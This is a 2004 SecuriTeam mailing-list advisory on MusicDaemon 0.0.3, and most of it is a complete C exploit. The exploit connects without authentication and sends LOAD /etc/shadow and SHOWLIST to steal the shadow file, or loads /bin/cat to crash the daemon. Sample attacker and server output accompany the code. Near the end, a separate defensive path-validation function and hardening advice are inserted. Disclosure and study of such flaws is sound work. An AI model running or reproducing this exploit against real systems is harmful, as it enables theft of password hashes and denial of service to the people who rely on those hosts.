[UNIX] Music Daemon DoS and File Disclosure Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/26/04

    To: list@securiteam.com
    Date: 26 Aug 2004 14:08:29 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Music Daemon DoS and File Disclosure Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://musicdaemon.sourceforge.net/about.xml> Music daemon (musicd) is a
    "music player designed to run as a independent server where different
    front-end can connect to control the play or get information about what is
    playing etc".

    Two remotely exploitable vulnerabilities have been found in the product.
    One allows an unauthenticated attacker to crash the daemon so that it no
    longer responds to legitimate users; the other allows reading of sensitive
    files, such as /etc/shadow, with the privileges of the user the daemon runs
    as (root by default).

    DETAILS

    Vulnerable Systems:
     * MusicDaemon version 0.0.3 and prior

    Exploit:
    /* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
    * Vulnerability discovered by: Tal0n 05-22-04
    * Exploit code by: Tal0n 05-22-04
    *
    * Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz,
    * serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
    * bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
    *
    * MusicDaemon MUST be running as root, which it does by default anyways.
    * Tested on Slackware 9 and Redhat 9, but should work generically since the
    * nature of this vulnerability doesn't require
    * shellcode or return addresses.
    *
    *
    * Client Side View:
    *
    * root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
    *
    * MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
    *
    * Connected to 127.0.0.1:1234...
    * Sending exploit data...
    *
    * <*** /etc/shadow file from 127.0.0.1 ***>
    *
    * Hello
    * <snipped for privacy>
    * ......
    * bin:*:9797:0:::::
    * ftp:*:9797:0:::::
    * sshd:*:9797:0:::::
    * ......
    * </snipped for privacy>
    *
    * <*** End /etc/shadow file ***>
    *
    * root@vortex:~/test#
    *
    * Server Side View:
    *
    * root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p 1234
    * Using configuration: ../musicd.conf
    * [Mon May 17 05:26:07 2004] cmd_set() called
    * Binding to port 5555.
    * [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
    * [Mon May 17 05:26:07 2004] cmd_modulescandir() called
    * [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234.
    * [Mon May 17 05:26:11 2004] New connection!
    * [Mon May 17 05:26:11 2004] cmd_load() called
    * [Mon May 17 05:26:13 2004] cmd_show() called
    * [Mon May 17 05:26:20 2004] Client lost.
    *
    *
    * As you can see, it simply makes a connection, sends the commands, and
    * leaves. MusicDaemon doesn't even log that new connection's IP that I
    * know of. Works very well, eh? :)
    *
    * The vulnerability for 1 is that there is no authentication. For 2, it
    * will let you "LOAD" any file on the box if you have the correct privileges,
    * and by default, as I said before, it runs as root, unless you change the
    * configuration file to make it run as a different user.
    *
    * After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
    * the contents of the actual file. You can substitute any file you want in
    * for /etc/shadow, I just coded it to grab it because it is such an
    * important system file if you know what I mean ;).
    *
    * As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST",
    * it will crash music daemon.
    *
    *
    */
      
      
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>      /* strlen, strcmp, memset */
    #include <unistd.h>      /* sleep, read, close */
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>   /* inet_addr */

    int main(int argc, char *argv[]) {

        char buffer[16384];

        /* Protocol commands sent to musicd; the daemon performs no authentication. */
        char *xpldata1 = "LOAD /etc/shadow\r\n";
        char *xpldata2 = "SHOWLIST\r\n";
        char *xpldata3 = "CLEAR\r\n";
        char *dosdata1 = "LOAD /bin/cat\r\n";
        char *dosdata2 = "SHOWLIST\r\n";
        char *dosdata3 = "CLEAR\r\n";

        int len1 = strlen(xpldata1);
        int len2 = strlen(xpldata2);
        int len3 = strlen(xpldata3);
        int len4 = strlen(dosdata1);
        int len5 = strlen(dosdata2);
        int len6 = strlen(dosdata3);

        if(argc != 4) {
            printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS");
            printf("\nDiscovered and Coded by: Tal0n 05-22-04\n");
            printf("\nUsage: %s <host> <port> <option>\n", argv[0]);
            printf("\nOptions:");
            printf("\n\t\tshadow - Steal /etc/shadow file");
            printf("\n\t\tdos - DoS Music Daemon\n\n");
            return 0;
        }

        printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS\n\n");

        int sock;
        struct sockaddr_in remote;

        memset(&remote, 0, sizeof(remote));
        remote.sin_family = AF_INET;
        remote.sin_port = htons(atoi(argv[2]));
        remote.sin_addr.s_addr = inet_addr(argv[1]);

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            printf("\nError: Can't create socket!\n\n");
            return -1;
        }

        if(connect(sock, (struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) {
            printf("\nError: Can't connect to %s:%s!\n\n", argv[1], argv[2]);
            return -1;
        }

        printf("Connected to %s:%s...\n", argv[1], argv[2]);

        if(strcmp(argv[3], "dos") == 0) {

            printf("Sending DoS data...\n");

            /* LOAD a non-audio binary, then SHOWLIST: the daemon crashes parsing it. */
            send(sock, dosdata1, len4, 0);
            sleep(2);
            send(sock, dosdata2, len5, 0);
            sleep(2);
            send(sock, dosdata3, len6, 0);

            printf("\nTarget %s DoS'd!\n\n", argv[1]);

            close(sock);
            return 0;
        }

        if(strcmp(argv[3], "shadow") == 0) {

            printf("Sending exploit data...\n");

            /* LOAD the file, then SHOWLIST echoes its contents back to the client. */
            send(sock, xpldata1, len1, 0);
            sleep(2);
            send(sock, xpldata2, len2, 0);
            sleep(5);

            printf("Done! Grabbing /etc/shadow...\n");

            /* Leave one byte so the buffer stays NUL-terminated for printf. */
            memset(buffer, 0, sizeof(buffer));
            read(sock, buffer, sizeof(buffer) - 1);

            sleep(2);

            printf("\n<*** /etc/shadow file from %s ***>\n\n", argv[1]);
            printf("%s", buffer);
            printf("\n<*** End /etc/shadow file ***>\n\n");

            send(sock, xpldata3, len3, 0);
            sleep(1);

            close(sock);
            return 0;
        }

        close(sock);
        return 0;
    }
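    Both issues above stem from the daemon passing a client-supplied path straight to LOAD. As an added, defender-side example that is not part of the advisory or of the MusicDaemon code, the following check is what a hardened cmd_load() could apply before opening anything: it confines LOAD to an assumed library root (MUSIC_ROOT, a hypothetical config value), rejects absolute paths, traversal components and control characters, and only admits playable extensions, which blocks both the /etc/shadow read and the crash-by-loading-a-binary.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed library root; a hardened musicd would read this from musicd.conf. */
#define MUSIC_ROOT "/var/lib/musicd/library"
#define MAX_REQ 512

/* Only playable media may be LOADed, so SHOWLIST can never dump /etc files or binaries. */
static const char *allowed_ext[] = { ".mp3", ".ogg", ".flac", ".wav", NULL };

static bool has_allowed_ext(const char *path)
{
    size_t n = strlen(path);
    for (int i = 0; allowed_ext[i] != NULL; i++) {
        size_t e = strlen(allowed_ext[i]);
        if (n > e && strcmp(path + n - e, allowed_ext[i]) == 0)
            return true;
    }
    return false;
}

/* Validate a client-supplied LOAD argument before the daemon opens anything.
 * Accepts only a relative path with no "." or ".." components, no empty
 * components and no control characters, ending in an allowed extension, and
 * writes MUSIC_ROOT/<path> into out.  Returns false otherwise.  This lexical
 * check must still be paired with an open-time realpath()/fstat() check so a
 * symlink planted inside the library cannot point at /etc/shadow. */
bool safe_load_path(const char *req, char *out, size_t outlen)
{
    if (req == NULL || req[0] == '\0' || req[0] == '/' || strlen(req) >= MAX_REQ)
        return false;
    for (const unsigned char *p = (const unsigned char *)req; *p != '\0'; p++)
        if (*p < 0x20 || *p == 0x7f)        /* CR/LF smuggling, DEL */
            return false;
    if (strstr(req, "//") != NULL || !has_allowed_ext(req))
        return false;

    char copy[MAX_REQ];
    strcpy(copy, req);                      /* length already bounded above */
    for (char *tok = strtok(copy, "/"); tok != NULL; tok = strtok(NULL, "/"))
        if (strcmp(tok, ".") == 0 || strcmp(tok, "..") == 0)
            return false;

    int n = snprintf(out, outlen, "%s/%s", MUSIC_ROOT, req);
    return n > 0 && (size_t)n < outlen;
}
```

    Running the daemon as an unprivileged user, as the advisory's own comment notes is possible via the configuration file, limits what such a check can fail to protect.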

    ADDITIONAL INFORMATION

    The information has been provided by Tal0n.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

